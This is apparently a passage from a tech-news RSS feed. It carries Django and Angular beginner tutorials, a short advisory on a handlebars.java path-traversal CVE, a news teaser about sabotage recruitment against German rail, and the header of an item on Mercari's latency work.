<li><code>views.py</code>: Contains functions that <a href="https://docs.djangoproject.com/en/6.0/#the-view-layer">render and return responses</a>.</li>
</ul>



<p class="wp-block-paragraph">To start working with the application, you need to first register it with the project. Edit <code>myproj/settings.py</code> as follows, adding a line to the top of the <code>INSTALLED_APPS</code> list:</p>



<pre class="wp-block-code"><code>
INSTALLED_APPS = [
    "myapp.apps.MyappConfig",
    "django.contrib.admin",
    ...
</code></pre>



<p class="wp-block-paragraph">If you look in <code>myproj/myapp/apps.py</code>, you’ll see a pre-generated object named <code>MyappConfig</code>, which we’ve referenced here.</p>



<h2 class="wp-block-heading">Adding routes and views to your Django application</h2>



<p class="wp-block-paragraph">Django applications follow a basic pattern for processing requests:</p>



<ul class="wp-block-list">
<li>When an incoming request is received, Django parses the URL for a <em>route</em> to apply it to.</li>



<li>Routes are defined in <code>urls.py</code>, with each route linked to a <em>view</em>, meaning a function that returns data to be sent back to the client. Views can be located anywhere in a Django project, but they’re best organized into their own modules.</li>



<li>Views can contain the results of a <em>template</em>, which is code that formats requested data according to a certain design.</li>
</ul>



<p class="wp-block-paragraph">To get an idea of how all these pieces fit together, let’s modify the default route of our sample application to return a custom message.</p>



<p class="wp-block-paragraph">Routes are defined in <code>urls.py</code>, in a list named <code>urlpatterns</code>. If you open the sample <code>urls.py</code>, you’ll see <code>urlpatterns</code> already predefined:</p>



<pre class="wp-block-code"><code>
urlpatterns = [
    path('admin/', admin.site.urls),
]
</code></pre>



<p class="wp-block-paragraph">The <code>path</code> function (a Django built-in) takes a route and a view function as arguments and generates a reference to a URL path. By default, Django creates an <code>admin</code> path that is used for site administration, but we need to create our own routes.</p>



<p class="wp-block-paragraph">Add another entry, so that the whole file looks like this:</p>



<pre class="wp-block-code"><code>
from django.contrib import admin
from django.urls import include, path

urlpatterns = [
    path('admin/', admin.site.urls),
    path('myapp/', include('myapp.urls'))
]
</code></pre>



<p class="wp-block-paragraph">The <code>include</code> function tells Django to look for more route pattern information in the file <code>myapp.urls</code>. All routes found in that file will be attached to the top-level route <code>myapp</code> (e.g., <code>http://127.0.0.1:8080/myapp</code>).</p>



<p class="wp-block-paragraph">Next, create a new <code>urls.py</code> in <code>myapp</code> and add the following:</p>



<pre class="wp-block-code"><code>
from django.urls import path
from . import views

urlpatterns = [
    path('', views.index)
]</code></pre>



<p class="wp-block-paragraph">Django prepends a slash to the beginning of each URL, so to specify the root of the site (<code>/</code>), we just supply a blank string as the URL.</p>



<p class="wp-block-paragraph">Now, edit the file <code>myapp/views.py</code> so it looks like this:</p>



<pre class="wp-block-code"><code>
from django.http import HttpResponse

def index(request):
    return HttpResponse("Hello, world!")
</code></pre>



<p class="wp-block-paragraph"><code>django.http.HttpResponse</code> is a Django built-in that generates an HTTP response from a supplied string. Note that <code>request</code>, which contains the information for an incoming HTTP request, must be passed as the first parameter to a view function.</p>



<p class="wp-block-paragraph">Stop and restart the development server, and navigate to <code>http://127.0.0.1:8000/myapp/</code>. You should see “”Hello, world!” appear in the browser.</p>



<h2 class="wp-block-heading">Adding routes with variables in Django</h2>



<p class="wp-block-paragraph">Django can accept routes that incorporate variables as part of their syntax. Let’s say you wanted to accept URLs that had the format <code>year/</code>. You could accomplish that by adding the following entry to <code>urlpatterns</code>:</p>



<pre class="wp-block-code"><code>path(‘year/’, views.year)</code></pre>



<p class="wp-block-paragraph">The view function <code>views.year</code> would then be invoked through routes like <code>year/1996</code>, <code>year/2010</code>, and so on, with the variable year passed as a parameter to <code>views.year</code>.</p>



<p class="wp-block-paragraph">To try this out for yourself, add the above <code>urlpatterns</code> entry to <code>myapp/urls.py</code>, then add this function to <code>myapp/views.py</code>:</p>



<pre class="wp-block-code"><code>
def year(request, year):
    return HttpResponse('Year: {}'.format(year))
    </code></pre>



<p class="wp-block-paragraph">If you navigate to <code>/myapp/year/2010</code> on your site, you should see <code>Year: 2010</code> displayed in response. Note that routes like <code>/myapp/year/rutabaga</code> will yield an error because the <code>int:</code> constraint on the variable year allows only an integer in that position. Many other <a href="https://docs.djangoproject.com/en/6.0/topics/http/urls">formatting options</a> are available for routes.</p>



<aside class="sidebar large">
<h3>Backward compatibility with older Django routes</h3>
<p>Earlier versions of Django had a more complex syntax for routes, which was difficult to parse. If you still need to add routes using the old syntax—for instance, for backward compatibility with an old Django project—you can use the <a href="https://docs.djangoproject.com/en/6.0/ref/urls/#django.urls.re_path">django.urls.re_path function</a>, which matches routes using regular expressions.</p>
</aside>




<h2 class="wp-block-heading">Django templates and template partials</h2>



<p class="wp-block-paragraph">You can use Django’s <a href="https://docs.djangoproject.com/en/6.0/ref/templates/language">built-in template language</a> to generate web pages from data.</p>



<p class="wp-block-paragraph">Templates used by Django apps are stored in a directory that is central to the project: <code>/templates//</code>. For our <code>myapp</code> project, the directory would be <code>myapp/templates/myapp/</code>. This directory structure may seem awkward, but allowing Django to look for templates in multiple places avoids name collisions between templates with the same name across multiple apps.</p>



<p class="wp-block-paragraph">In your <code>myapp/templates/myapp/</code> directory, create a file named <code>year.html</code> with the following content:</p>



<pre class="wp-block-code"><code>Year: {{year}}</code></pre>



<p class="wp-block-paragraph">Any value within double curly braces in a template is treated as a variable. Everything else is treated literally.</p>



<p class="wp-block-paragraph">Modify <code>myapp/views.py</code> to look like this:</p>



<pre class="wp-block-code"><code>
from django.shortcuts import render
from django.http import HttpResponse

def index(request):
    return HttpResponse("Hello, world!")

def year(request, year):
    data = {'year':year}
    return render(request, 'myapp/year.html', data)
</code></pre>



<p class="wp-block-paragraph">The <code>render</code> function—a Django “shortcut” (a combination of multiple built-ins for convenience)—takes the existing request object, looks for the template <code>myapp/year.html</code> in the list of available template locations, and passes the dictionary data to it as <em>context</em> for the template. The template uses the dictionary as a namespace for variables used in the template. In this case, the variable <code>{{year}}</code> in the template is replaced with the value for the key year in the dictionary data (that is, <code>data["year"]</code>).</p>



<p class="wp-block-paragraph">The amount of processing you can do on data within Django templates is intentionally limited. Django’s philosophy is to enforce the separation of presentation and business logic whenever possible. Thus, you can loop through an iterable object, and you can perform if/then/else tests, but modifying the data within a template is discouraged.</p>



<p class="wp-block-paragraph">For instance, you could encode a simple “if” test this way:</p>



<pre class="wp-block-code"><code>
{% if year &gt; 2000 %}
21st century year: {{year}}
{% else %}
Pre-21st century year: {{year}}
{% endif %}
</code></pre>



<p class="wp-block-paragraph">The <code>{%</code> and <code>%}</code> markers delimit blocks of code that can be executed in Django’s template language.</p>



<p class="wp-block-paragraph">If you want to use a more sophisticated template processing language, you can swap in something like <a href="https://pypi.org/project/Jinja2">Jinja2</a> or <a href="https://www.makotemplates.org/">Mako</a>. Django includes <a href="https://docs.djangoproject.com/en/6.0/topics/templates/#django.template.backends.jinja2.Jinja2">back-end integration for Jinja2</a>, but you can use any template language that returns a string—for instance, by returning that string in an <code>HttpResponse</code> object, as in the case of our “Hello, world!” route.</p>



<p class="wp-block-paragraph">In versions 6 and up, Django supports <a href="https://docs.djangoproject.com/en/6.0/ref/templates/language/#template-partials">template partials</a>, a way to create portions of a template that can be defined once and reused throughout a template. This lets you precompute a given value once over the course of a given template—such as a fancy display version of a user name—and re-use it without having to recompute it each time it’s displayed.</p>



<h2 class="wp-block-heading">Doing more with Django</h2>



<p class="wp-block-paragraph">What you’ve seen here covers only the most basic elements of a Django application. Django includes a great many other components for use in web projects. Here’s a quick overview:</p>



<ul class="wp-block-list">
<li><strong>Databases and data models</strong>: Django’s <a href="https://docs.djangoproject.com/en/6.0/topics/db">built-in ORM</a> lets you define data structures and relationships between them, as well as migration paths between versions of those structures.</li>



<li><strong>Forms</strong>: Django provides a consistent way for views to supply <a href="https://docs.djangoproject.com/en/6.0/topics/forms">input forms</a> to a user, retrieve data, normalize the results, and provide consistent error reporting. Django 6 added support for <a href="https://docs.djangoproject.com/en/6.0/topics/security/#security-csp">Content Security Policy</a>, a way to prevent submitted forms from being vulnerable to content injection or cross-site scripting (XSS) attacks.</li>



<li><strong>Security and utilities</strong>: Django includes <a href="https://docs.djangoproject.com/en/5.0/#common-web-application-tools">many built-in functions</a> for caching, logging, session handling, handling static files, and normalizing URLs. It also bundles tools for <a href="https://docs.djangoproject.com/en/5.0/#common-web-application-tools">common security needs</a> like using cryptographic certificates or guarding against cross-site forgery protection or clickjacking.</li>



<li><strong>Tasks</strong>: Django 6 added a native mechanisms for creating and managing long-running <a href="https://docs.djangoproject.com/en/6.0/topics/tasks">background tasks</a>, without holding up a response to the user. Note that Django only provides ways to set up and keep track of tasks; it doesn’t include the actual execution mechanism. The only included back ends for tasks are for testing, so you will either need to add a third-party solution or write your own using Django’s back-end task code as a base.</li>
</ul>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Get started with Angular: Introducing the modern reactive workflow]]></title>
<description><![CDATA[Angular is a cohesive, all-in-one reactive framework for web development. It is one of the larger reactive frameworks, focused on being a single architectural system that handles all your web development needs under one idiom. While Angular was long criticized for being heavyweight as compared to...]]></description>
<link>https://tsecurity.de/de/3665664/ai-nachrichten/get-started-with-angular-introducing-the-modern-reactive-workflow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665664/ai-nachrichten/get-started-with-angular-introducing-the-modern-reactive-workflow/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:25 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Angular is a cohesive, all-in-one <a href="https://www.infoworld.com/article/3962039/what-you-need-to-know-about-angular-react-vue-and-svelte-popular-javascript-frameworks-compared.html">reactive framework</a> for web development. It is one of the larger reactive frameworks, focused on being a single architectural system that handles all your web development needs under one idiom. While Angular was long criticized for being heavyweight as compared to <a href="https://www.infoworld.com/article/2253289/react-tutorial-get-started-with-the-reactjs-javascript-library.html">React</a>, many of those issues <a href="https://www.infoworld.com/article/3964105/catching-up-with-angular-19.html">were addressed in Angular 19</a>. Modern Angular is built around the <a href="https://blog.angular-university.io/angular-signals">Signals API</a> and minimal formality, while still delivering a one-stop-shop that includes dependency injection and integrated routing.</p>



<p class="wp-block-paragraph">Angular is popular with the enterprise because of its stable, curated nature, but it is becoming more attractive to the wider developer community thanks to its more <a href="https://www.infoworld.com/article/3802707/angular-team-unveils-strategy-for-2025.html">community engaged development philosophy</a>. That, along with its recent technical evolution, make Angular one of the most interesting projects to watch right now.</p>



<h2 class="wp-block-heading">Why choose Angular?</h2>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/2336227/whats-the-best-javascript-framework.html">Choosing a JavaScript development framework</a> sometimes feels like a philosophical debate, but it should be a practical decision. Angular is unique because it is strongly opinionated. It doesn’t just give you a view layer; it provides a complete toolkit for building web applications.</p>



<p class="wp-block-paragraph">Like other reactive frameworks, Angular is built around its reactive engine, which lets you bind state (variables) to the view. But if that’s all you needed, one of the smaller, more focused frameworks would be more than enough. What Angular has that some of these other frameworks don’t is its ability to use data binding to automatically synchronize data from your user interface (UI) with your JavaScript objects. Angular also leverages dependency injection and inversion of control to help structure your application and make it easier to test. And it contains more advanced features like server-side rendering (SSR) and static-site generation (SSG) within itself, rather than requiring you to engage a <a href="https://www.infoworld.com/article/3831686/plug-and-play-web-development-with-astro-js.html">meta-framework</a> for either style of development.</p>



<p class="wp-block-paragraph">While Angular might not be your top choice for every occasion, it’s an excellent option for larger projects that require features you won’t get with a more lightweight framework.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/3964105/catching-up-with-angular-19.html" data-type="link" data-id="https://www.infoworld.com/article/3964105/catching-up-with-angular-19.html">Catching up with Angular 19</a>.</strong></p>



<h2 class="wp-block-heading">Getting started with Angular</h2>



<p class="wp-block-paragraph">With those concepts in mind, let’s set up Angular in your development environment. After that, we can run through developing a web application with Angular. To start, make sure you have Node and NPM installed. From the command line, enter:</p>



<pre class="wp-block-code"><code>$ node -v
$ npm -v</code></pre>



<p class="wp-block-paragraph">Next, you can use the Angular CLI to launch a new app:</p>



<pre class="wp-block-code"><code>$ ng new iw-ng</code></pre>



<p class="wp-block-paragraph">You can use the defaults in your responses to the interactive prompts shown here:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/01/angular1.png?w=1024" alt="A screenshot of a new project setup in the Angular command-line interface." class="wp-image-4123771" width="1024" height="413" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Matthew Tyson</p></div>



<p class="wp-block-paragraph">We now have a basic project layout in the new directory, which you can import into an IDE (such as <a href="https://www.infoworld.com/article/2254808/get-started-with-visual-studio-code.html" data-type="link" data-id="https://www.infoworld.com/article/2254808/get-started-with-visual-studio-code.html">VS Code</a>) or edit directly.</p>



<p class="wp-block-paragraph">Looking at the project layout, you might notice it is fairly lean, a break from Angular projects of the past. The most important parts are:</p>



<ul class="wp-block-list">
<li><code>src/main.ts</code>: This is the main entry point. In older versions of Angular, this file had to bootstrap a module, which then bootstrapped a component. Now, it avoids any verbose syntax, calling bootstrapApplication with your root component directly.</li>



<li><code>src/index.html</code>: The main HTML page that hosts your application. This is the standard index.html that serves all root requests in a web page and contains the  tag where your Angular component will render. It is the “body” that the “spirit” of your code animates.</li>



<li><code>src/app/app.ts</code>: The root component of your application. This single file defines the view logic and the component metadata. In the new “standalone” world, it manages its own imports, meaning you can see exactly what dependencies it uses right at the top of the file. (This is the <code></code> root element that appears in <code>src/index.html</code>.)</li>



<li><code>src/app/app.config.ts</code>: This file is new in modern Angular and replaces the old A<code>ppModule providers</code> array. It is where you configure global services, like the router or HTTP client.</li>



<li><code>angular.json</code>: The configuration file for the CLI itself. It tells the build tools how to process your code, though you will rarely need to touch this file manually anymore.</li>
</ul>



<p class="wp-block-paragraph">Here is the basic flow of how the engine renders these components:</p>



<ol start="1" class="wp-block-list">
<li><strong>The arrival (HTML)</strong>: The browser receives <code>index.html</code>. The <code></code> tag is there, but it’s empty.</li>



<li><strong>The unpacking (JavaScript)</strong>: The browser sees the <code></code> tags at the bottom of the HTML and downloads the JavaScript bundles (your compiled code) from <code>src/app/app.ts</code>.</li>



<li><strong>The assembly (Bootstrap)</strong>: The browser runs that JavaScript. The code “wakes up,” finds the <code></code> tag in the DOM, and dynamically inserts your title, buttons, and lists.</li>
</ol>



<p class="wp-block-paragraph">This flow will be different if you are using server-side rendering (SSR), but we’ll leave that option aside for now. Now that you’ve seen the basic architecture, let’s get into the code.</p>



<h2 class="wp-block-heading">Developing your first web app in Angular</h2>



<p class="wp-block-paragraph">If you open <code>src/app/app.ts</code> (more info <a href="http://app.ts/">here</a>) the component definition looks like this:</p>



<pre class="wp-block-code"><code>import { Component, signal } from '@angular/core';
import { RouterOutlet } from '@angular/router';

@Component({
  selector: 'app-root',
  imports: [RouterOutlet],
  templateUrl: './app.html',
  styleUrl: './app.css'
})
export class App {
  protected readonly title = signal('iw-ng');
}</code></pre>



<p class="wp-block-paragraph">Before we dissect the code, let’s run the app and see what it produces:</p>



<pre class="wp-block-code"><code>$ ng serve</code></pre>



<p class="wp-block-paragraph">You should see a page like this one at <code>localhost:4200</code>:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/01/angular2.png?w=1024" alt="A screenshot of a Hello, World! app built with Angular." class="wp-image-4123772" width="1024" height="585" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Matthew Tyson</p></div>



<p class="wp-block-paragraph">Returning to the <code>src/app.ts</code> component, notice that there are three main parts of the definition: the class, the metadata, and the view. Let’s unpack these separately.</p>



<h3 class="wp-block-heading">The class (export class App)</h3>



<p class="wp-block-paragraph">Export class <code>App</code> is vanilla TypeScript that holds your component’s data and logic. In our example, <code>title = signal(‘iw-ng’)</code> defines a piece of reactive state. Unlike older versions of Angular where data was just a plain property, here we use a <a href="https://www.solidjs.com/tutorial/introduction_signals">signal</a>. Signals are wrappers around values that notify the template precisely when they change, enabling fine-grained performance.</p>



<h3 class="wp-block-heading">The metadata (@Component)</h3>



<p class="wp-block-paragraph">The <code>@Component</code> decorator tells Angular it is dealing with a component, not just a generic class. There are several elements involved in the decorator’s communication with the engine:</p>



<ul class="wp-block-list">
<li><code>selector: 'app-root'</code>: Defines the custom HTML tag associated with any given component. Angular finds <code></code> in your <code>index.html</code> and renders the component there.</li>



<li><code>imports</code>: In the new Angular era, dependencies are explicit. You list exactly what a component needs (like <code>RouterOutlet</code> or other components) here, rather than hiding them in a separate module file.</li>



<li><code>templateUrl</code>: Points to the external HTML file that defines the view.</li>
</ul>



<h3 class="wp-block-heading">The view (the template)</h3>



<p class="wp-block-paragraph">This is the visual part of the component, defined in <code>app.html</code>. It combines standard HTML with Angular’s template syntax. (JSX handles this part for React-based apps.)</p>



<p class="wp-block-paragraph">We can modify <code>src/app/app.html</code> to see how these three elements work together. To start, delete the default content and add the following:</p>



<pre class="wp-block-code"><code><h1>Hello, {{ title() }}</h1>
</code></pre>



<p class="wp-block-paragraph">The double curly braces <code>{{ }}</code> are called <a href="https://angular.dev/guide/templates/binding">interpolation</a>. Notice the parentheses in <code>title()</code>. We are reading the “title” signal value by calling its function. If you were to update that signal programmatically (e.g., <code>this.title.set('New Value')</code>), the text on the screen would update instantly.</p>



<h2 class="wp-block-heading">Angular’s built-in control flow</h2>



<p class="wp-block-paragraph">Old-school Angular required “structural directives” like <code>*ngIf</code> and <code>*ngFor</code> logic control. These were powerful but required importing <code>CommonModule</code> and learning a specific micro-syntax. Modern Angular uses a built-in control flow that looks like standard JavaScript (similar to other Reactive platforms).</p>



<p class="wp-block-paragraph">To see the new control flow in action, let’s add a list to our component. Update <code>src/app/app.ts</code> as follows, leaving the rest of the file the same:</p>



<pre class="wp-block-code"><code>export class App {
  protected readonly title = signal('iw-ng');
  protected readonly frameworks = signal(['Angular', 'React', 'Vue', 'Svelte']);
  protected showList = signal(true);

  toggleList() {
    this.showList.update(v =&gt; !v);
  }
}</code></pre>



<p class="wp-block-paragraph">While we’re at it, let’s also update <code>src/app/app.html</code> to render this new list (don’t worry about <code></code> for now; it just tells Angular where to render the framing template):</p>



<pre class="wp-block-code"><code><button>Toggle List</button>

@if (showList()) {
  <ul>
    @for (tech of frameworks(); track tech) {
      <li>{{ tech }}</li>
    }
  </ul>
} @else {
  <p>List is hidden</p>
}

</code></pre>



<p class="wp-block-paragraph">The app will now display a list that can be toggled for visibility:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/01/angular3.png?w=1024" alt="Screenshot of a list that can be toggled on and off for visibility." class="wp-image-4123773" width="1024" height="585" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Matthew Tyson</p></div>



<p class="wp-block-paragraph">This syntax is cleaner and easier to read than the old <code>*ngFor</code> loops:</p>



<ul class="wp-block-list">
<li><code>@if</code> conditionally renders the block if the signal’s value is true.</li>



<li><code>@for</code> iterates over the array. The track keyword is required for performance (it tells Angular how to identify unique items in the list).</li>



<li><code>(click)</code> is an <a href="https://angular.dev/guide/templates/event-listeners">event binding</a>. It lets us run code (the <code>toggleList</code> method) when the user interacts with the button.</li>
</ul>



<h2 class="wp-block-heading">Services: Managing business logic in Angular</h2>



<p class="wp-block-paragraph">Components focus on the view (i.e., what you see). For the business logic that backs the application functionality, we use services.</p>



<p class="wp-block-paragraph">A service is just a class that can be “injected” into a component that needs it. This is Angular’s famous dependency injection system. It allows you to write logic once and reuse it anywhere. It’s a slightly different way of thinking about how an application is wired together, but it gives you real organizational benefits over time.</p>



<p class="wp-block-paragraph">To generate a service, you can use the CLI:</p>



<pre class="wp-block-code"><code>$ ng generate service frameworks</code></pre>



<p class="wp-block-paragraph">This command creates a <code>src/app/hero.ts</code> file. In modern Angular, we define services using the <code>@Injectable</code> decorator. Currently, the <code>src/app/hero.ts</code> file just has this:</p>



<pre class="wp-block-code"><code>import { Injectable } from '@angular/core';

@Injectable({
  providedIn: 'root',
})
export class Frameworks {
  
}</code></pre>



<p class="wp-block-paragraph">Open the file and add a simple method to return our data:</p>



<pre class="wp-block-code"><code>import { Injectable } from '@angular/core';

@Injectable({
  providedIn: 'root', // Available everywhere in the app
})
export class Frameworks {
  getList() {
    return ['Angular', 'React', 'Vue', 'Svelte'];
  }
}</code></pre>



<p class="wp-block-paragraph">The providedIn: <code>'root'</code> metadata is important, it tells Angular to create a single, shared instance of this service for the entire application (you might recognize this as an instance of the <a href="https://en.wikipedia.org/wiki/Singleton_pattern">singleton pattern</a>).</p>



<h3 class="wp-block-heading">Using the service</h3>



<p class="wp-block-paragraph">In the past, we had to list dependencies in the constructor. Modern Angular offers a cleaner way: the <code>inject()</code> function. Subsequently, we can refactor our <code>src/app/app.ts</code> to get its data from the service instead of hardcoding it:</p>



<pre class="wp-block-code"><code>import { Component, inject, signal } from '@angular/core';
import { RouterOutlet } from '@angular/router';
import { Frameworks } from './frameworks'; // Import the service

@Component({
  selector: 'app-root',
  imports: [RouterOutlet],
  templateUrl: './app.html',
  styleUrl: './app.css'
})
export class App {
  private frameworksService = inject(Frameworks); // Dependency Injection
  
  protected readonly title = signal('iw-ng');
  
  // Initialize signal with data directly from the service
  protected readonly frameworks = signal(this.frameworksService.getList());
  protected showList = signal(true);

  toggleList() {
    this.showList.update(v =&gt; !v);
  }
}</code></pre>



<p class="wp-block-paragraph">Dependency injection is a powerful pattern. The component doesn’t need to know where the list came from (it could be coming from an API, a database, or a hard-coded array); it just asks the service for what it needs. This pattern adds a bit of extra work up front, but it delivers a more flexible, organized codebase as the app grows in size and complexity.</p>



<h2 class="wp-block-heading">Routers and routes</h2>



<p class="wp-block-paragraph">Once your application grows beyond a single view, you need a way to navigate between different screens. In Angular, we use the built-in router for this purpose. In our example project, <code>src/app/app.routes.ts </code>is the dedicated home for the router config. Let’s follow the steps for creating a new route.</p>



<p class="wp-block-paragraph">First, we define the route. When you open <code>src/app/app.routes.ts</code>, you will see an exported routes array. This array contains the available routes for your app. Each string name resolves to a component that handles rendering that route. In effect, this is the map of your application’s landscape.</p>



<p class="wp-block-paragraph">In a real application, you’d often have “framing template” material in the root of the app (like the navbar) and then the routes fill in the body content. (Remember that by default, Angular is designed for single-page apps, where navigation does reload the screen, but swaps content.)</p>



<p class="wp-block-paragraph">For now, let’s just get a sense of how the router works. First, create a new component so we have a destination to travel to. In your terminal, run:</p>



<pre class="wp-block-code"><code>$ ng generate component details</code></pre>



<p class="wp-block-paragraph">This will generate a simple <code>details</code> component in the <code>src/app/details</code> directory.</p>



<p class="wp-block-paragraph">Now we can update <code>src/app/app.routes.ts</code> to include this new path. We will also add a “default” path that redirects empty requests to the home view, ensuring the user always lands somewhere:</p>



<pre class="wp-block-code"><code>import { Routes } from '@angular/router';
import { App } from './app'; // Matches src/app/app.ts
import { Details } from './details/details'; // Matches src/app/details/details.ts

export const routes: Routes = [
  { path: '', redirectTo: '/home', pathMatch: 'full' },
  { path: 'home', component: App },
  { path: 'details', component: Details },
];</code></pre>



<p class="wp-block-paragraph">Now if you visit <code>localhost:4200/home</code>, you’ll get the message from the <code>details</code> component: “Details works!”</p>



<p class="wp-block-paragraph">Next, we’ll use the <code>routerLink</code> directive to move between views without refreshing the page. In <code>src/app/app.html</code>,  we create a navigation bar that sits permanently at the top of the page (the “stationary” element), while the router swaps the content below it (the “impermanent” element):</p>



<pre class="wp-block-code"><code><nav>
  <a>Home</a> | 
  <a>Details</a>
</nav>

<hr>

</code></pre>



<p class="wp-block-paragraph">And with that, the application has a navigation flow. The user clicks, the URL updates, and the content transforms, all without the jarring flicker of a browser reload.</p>



<h2 class="wp-block-heading">Parametrized routes</h2>



<p class="wp-block-paragraph">The last thing we’ll look at is handling route parameters, where the route accepts variables in the path. To manage this kind of dynamic data, you define a route with a variable, marked by a colon. Open <code>src/app/app.routes.ts</code> and add a dynamic path:</p>



<pre class="wp-block-code"><code>export const routes: Routes = [
  // ... existing routes
  { path: 'details/:id', component: Details }, 
];</code></pre>



<p class="wp-block-paragraph">The <code>:id</code> is a placeholder. Whether the URL is <code>/details/42</code> or <code>/details/108</code>, this router will receive it because it matches the path. Inside the details component, we have access to this parameter (using the <a href="https://angular.dev/api/router/ActivatedRoute">ActivatedRoute</a> service or the new <a href="https://angular.dev/api/router/withComponentInputBinding">withComponentInputBinding</a>). We can use that value to retrieve the data we need (like using it to recover a detail item from a database).</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">We have seen the core elements of modern Angular: Setting up the environment, building reactive components with signals, organizing logic with services, and tying it all together with interactive routing.</p>



<p class="wp-block-paragraph">Deploying these pieces together is the basic work in Angular. Once you get comfortable with it, you have an extremely powerful platform at your fingertips. And, when you are ready to go deeper, there is a whole lot more to explore in Angular, including:</p>



<ul class="wp-block-list">
<li>State management: Beyond signals, Angular has support for managing complex, application-wide state.</li>



<li>Forms: Angular has a robust system for handling user input.</li>



<li>Signals: We only scratched the surface of signals here. Signals offer a powerful, fine-grained way to manage state changes.</li>



<li>Build: You can learn more about producing production builds.</li>



<li><a href="https://www.infoworld.com/article/3964105/catching-up-with-angular-19.html" data-type="link" data-id="https://www.infoworld.com/article/3964105/catching-up-with-angular-19.html">RxJS</a>: Takes reactive programming to the next level.</li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-55760 | jknack handlebars.java up to 4.5.1 Template Loader compile path traversal]]></title>
<description><![CDATA[A vulnerability classified as problematic was found in jknack handlebars.java up to 4.5.1. Impacted is the function compile of the component Template Loader. Such manipulation leads to path traversal.

This vulnerability is traded as CVE-2026-55760. The attack may be launched remotely. There is n...]]></description>
<link>https://tsecurity.de/de/3664010/sicherheitsluecken/cve-2026-55760-jknack-handlebarsjava-up-to-451-template-loader-compile-path-traversal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664010/sicherheitsluecken/cve-2026-55760-jknack-handlebarsjava-up-to-451-template-loader-compile-path-traversal/</guid>
<pubDate>Mon, 13 Jul 2026 02:35:37 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> was found in <a href="https://vuldb.com/product/jknack:handlebars">jknack handlebars.java up to 4.5.1</a>. Impacted is the function <code>compile</code> of the component <em>Template Loader</em>. Such manipulation leads to path traversal.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-55760">CVE-2026-55760</a>. The attack may be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Guess Who Commissioned “Kommando Angry Birds” to Burn German Rail]]></title>
<description><![CDATA[Back in September 2025 the German federal security services published a very timely template. Foreign intelligence, mostly Russian, will use untrained recruits called “Wegwerf-Agenten” through social media and messenger apps. Small sums will be paid for tasks of arson, sabotage, and attacks on en...]]></description>
<link>https://tsecurity.de/de/3663660/it-security-nachrichten/guess-who-commissioned-kommando-angry-birds-to-burn-german-rail/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663660/it-security-nachrichten/guess-who-commissioned-kommando-angry-birds-to-burn-german-rail/</guid>
<pubDate>Sun, 12 Jul 2026 19:37:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Back in September 2025 the German federal security services published a very timely template. Foreign intelligence, mostly Russian, will use untrained recruits called “Wegwerf-Agenten” through social media and messenger apps. Small sums will be paid for tasks of arson, sabotage, and attacks on energy, transport, and rail infrastructure. The disclosure of risk from cells of … <a href="https://www.flyingpenguin.com/guess-who-commissioned-kommando-angry-birds-to-burn-german-rail/" class="more-link">Continue reading <span class="screen-reader-text">Guess Who Commissioned “Kommando Angry Birds” to Burn German Rail</span> <span class="meta-nav">→</span></a>]]></content:encoded>
</item>
<item>
<title><![CDATA[How Mercari reduced request latency by 15% with Cloud Profiler]]></title>
<description><![CDATA[Editor’s note: For retailers, predicting consumers’ desires and demand is the holy grail. For retail IT, the goal is understanding the performance of your ecommerce applications. Here, Japanese online retailer Mercari shows how they used Cloud Profiler and Trace to understand a complex microservi...]]></description>
<link>https://tsecurity.de/de/3662835/it-security-nachrichten/how-mercari-reduced-request-latency-by-15-with-cloud-profiler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662835/it-security-nachrichten/how-mercari-reduced-request-latency-by-15-with-cloud-profiler/</guid>
<pubDate>Sun, 12 Jul 2026 08:06:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
